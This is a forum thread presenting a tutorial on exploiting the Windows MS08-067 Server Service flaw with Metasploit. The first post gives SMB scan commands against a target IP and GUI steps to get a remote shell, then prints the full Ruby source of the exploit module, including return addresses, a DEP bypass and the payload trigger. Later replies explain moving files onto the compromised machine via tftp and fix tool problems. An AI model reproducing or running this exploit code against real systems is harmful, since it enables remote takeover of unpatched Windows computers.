Results 1 to 6 of 6

Thread: MS08-067 with metasploit

  1. #1
    Member Nagual's Avatar
    Join Date
    Nov 2007
    Posts
    289

    Default MS08-067 with metasploit

    I wrote this some weeks ago when Mr HDM added the sploit in metasploit.

    How to sploit a computer with the vulnerability MS08-067 with metasploit.
    Don't forget to update Metasploit.

    infos:
    http://www.microsoft.com/france/tech.../ms08-067.mspx
    http://www.metasploit.com/dev/trac/b...pi.rb?rev=5820

    First of all we can use metasploit as a scanner
    I made the first scan with the msfconsole

    scan SMB

    Code:
    msf > use scanner/smb/version
    msf auxiliary(version) > set RHOSTS 192.168.1.63
    RHOSTS => 192.168.1.63
    msf auxiliary(version) > run[*] 192.168.1.63 is running Windows XP Service Pack 2 (language: French)[*] Auxiliary module execution completed
    Finally i decided to use the gui, it's more funny for a tutorial.

    Second scan to check if the target computer has a vulnerability

    We put the scan options



    Now, if everything is ok we can start the scan



    No we can launch our attack

    We chosse the good sploit and the right target def. (remeber our fist scan)



    Select the payload and enter the target spec.



    Now, if everything is ok we can lauch the exploit



    Here we go, we have a shell on the target.




    If you don't have the ms08_067_netapi.rb option in the auxiliary you can add it. Just add the file in this directory /pentest/exploits/framework3/modules/auxiliary/scanner/smb/
    Or create the file "ms08_067_netapi.rb" in the directory /pentest/exploits/framework3/modules/auxiliary/scanner/smb/
    and add it the following code

    Code:
    ##
    # $Id:$
    ##
    
    ##
    # This file is part of the Metasploit Framework and may be subject to 
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/projects/Framework/
    ##
    
    
    require 'msf/core'
    
    
    class Metasploit3 < Msf::Exploit::Remote
    
    
    	include Msf::Exploit::Remote::DCERPC
    	include Msf::Exploit::Remote::SMB
    
    
    	def initialize(info = {})
    		super(update_info(info,	
    			'Name'           => 'Microsoft Server Service Relative Path Stack Corruption',
    			'Description'    => %q{
            		This module exploits a parsing flaw in the path canonicalization code of
    				NetAPI32.dll through the Server Service. This development version has 
    				been tested against Windows XP SP2 with DEP enabled.
    			},
    			'Author'         => 
    				[
    					'hdm'
    				],
    			'License'        => MSF_LICENSE,
    			'Version'        => '$Revision: 5773 $',
    			'References'     =>
    				[
    					[ 'MSB', 'MS08-067' ],
    				],
    			'DefaultOptions' =>
    				{
    					'EXITFUNC' => 'thread',
    				},
    			'Privileged'     => true,
    			'Payload'        =>
    				{
    					'Space'    => 400,
    					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
    					'StackAdjustment' => -3500,
    				},
    			'Platform'       => 'win',
    			'Targets'        => 
    				[
    					[ 'Windows XP SP2 English', { 'Ret' => 0x6f88f727, 'DisableNX' => 0x6F8916E2, 'Scratch' => 0x00020408 }], # jmp esi / disablenx (acgenral.dll)
    					[ 'Windows XP SP3 English', { 'Ret' => 0x6f88f807, 'DisableNX' => 0x6F8917C2, 'Scratch' => 0x00020408 }], # jmp esi / disablenx (acgenral.dll)
    					
    					[ 'Windows 2003 SP0 English', { 'Ret' => 0x71bf175f, 'DisableNX' => 0x71bf175f, 'Scratch' => 0x00020408 }], # jmp esi / jmp esi (ws2help.dll)
    				],
    
    			'DisclosureDate' => 'Oct 12 2008'))
    
    		register_options(
    			[
    				OptString.new('SMBPIPE', [ true,  "The pipe name to use (BROWSER, SRVSVC)", 'BROWSER']),
    			], self.class)
    						
    	end
    
    	def exploit	
    	
    # NET_API_STATUS NetprPathCanonicalize(
    #  [in, string, unique] SRVSVC_HANDLE ServerName,
    #  [in, string] WCHAR* PathName,
    #  [out, size_is(OutbufLen)] unsigned char* Outbuf,
    #  [in, range(0,64000)] DWORD OutbufLen,
    #  [in, string] WCHAR* Prefix,
    #  [in, out] DWORD* PathType,
    #  [in] DWORD Flags
    # );
    
    		# Padding is really picky for some reason
    		padder = [*("A".."Z")]
    		pad = "A"
    		while(pad.length < 7)
    			c = padder[rand(padder.length)]
    			next if pad.index(c)
    			pad += c
    		end
    		
    
    		prefix = ""
    		server = Rex::Text.rand_text_alpha(rand(8)+1).upcase
    
    		jumper = Rex::Text.rand_text_alpha(70).upcase
    		jumper[04,4] = [target.ret].pack("V") # jmp esi
    		jumper[58,2] = "\xeb\x62"
    
    		path = 
    			Rex::Text.to_unicode("\\") +
    		
    			# This buffer is removed from the front
    			Rex::Text.rand_text_alpha(100) + 
    			
    			# Shellcode
    			payload.encoded +
    			
    			# Relative path to trigger the bug
    			Rex::Text.to_unicode("\\..\\..\\") + 
    			
    			# Extra padding
    			Rex::Text.to_unicode(pad) +
    			
    			# Writable memory location (static)
    			[target['Scratch']].pack("V") + # EBP
    			
    			# NS_DisableNX::g_szCommandLine() FTW (acgenral.dll)
    			[target['DisableNX']].pack("V") +
    			
    			# Padding with embedded jump
    			jumper +
    			
    			# NULL termination
    			"\x00" * 2
    
    		connect()
    		smb_login()
    
    		handle = dcerpc_handle(
    			'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 
    			'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
    		)
    
    		print_status("Binding to #{handle} ...")
    		dcerpc_bind(handle)
    		print_status("Bound to #{handle} ...")
    
    		stub = 
    			NDR.uwstring(server) +
    			NDR.UnicodeConformantVaryingStringPreBuilt(path) +
    			NDR.long(rand(1024)) +
    			NDR.wstring("") +
    			NDR.long(4097) +
    			NDR.long(0)		
    		
    		begin
    			print_status("Triggering the vulnerability...")	
    			dcerpc.call(0x1f, stub)
    		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
    		rescue => e
    			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
    				raise e
    			end
    		end
    
    		# Cleanup
    		handler
    		disconnect
    	end
    
    end
    Have fun with Metasploit, tx Mr HDM

  2. #2
    Member
    Join Date
    Jun 2008
    Posts
    50

    Default

    I have successfully exploited my xp2 (with no firewall and unpatched for a while!!) and go the c:\ prompt. I caanot seem to send the victim machine any files from the linux machine.

    I have tried smb? Authentication fails - I have the login and password!!
    I have treid creating new users (net user xxx/add etc and making an admin rights)
    I have tried smb4k, again authentifictaion fails
    I have tried Konquerer again with same isse.

    I am guessing I am missing something? Any ideas how I can move files from a linux machine to a windows xp machine.

    Not that its relevant, but the specifc files I am trying to move are pureh@te vnc video files.

    Any pointers appreciated.

    Thanks

  3. #3
    fastboi
    Guest

    Default

    i installed new 3.2... and once i run msfgui... after 5 secs or so i get... aborted. Anyone have idea why it is acting up?

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by letmein View Post
    I have successfully exploited my xp2 (with no firewall and unpatched for a while!!) and go the c:\ prompt. I caanot seem to send the victim machine any files from the linux machine.

    I have tried smb? Authentication fails - I have the login and password!!
    I have treid creating new users (net user xxx/add etc and making an admin rights)
    I have tried smb4k, again authentifictaion fails
    I have tried Konquerer again with same isse.

    I am guessing I am missing something? Any ideas how I can move files from a linux machine to a windows xp machine.

    Not that its relevant, but the specifc files I am trying to move are pureh@te vnc video files.

    Any pointers appreciated.

    Thanks
    The easiest way is to use tftp. Backtrack has a tftp server on it which creates a home directory in /tmp which listens on port 63 I think. Then execute the tftp command from the windows box with GET and grab the file. I think I do that in one of those videos although I can't remember. The reason tftp is the best is because its on by default in XP. This is not the case in Vista.

  5. #5
    Junior Member
    Join Date
    Feb 2008
    Posts
    26

    Default

    can i input a iplist.txt to the scanner?

  6. #6
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Quote Originally Posted by fastboi View Post
    i installed new 3.2... and once i run msfgui... after 5 secs or so i get... aborted. Anyone have idea why it is acting up?
    Did you update your gtk2-Version lately??
    Plz start msfgui it with

    Code:
    ./msf -D -v 3
    What's the output?
    Don't eat yellow snow :rolleyes:

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •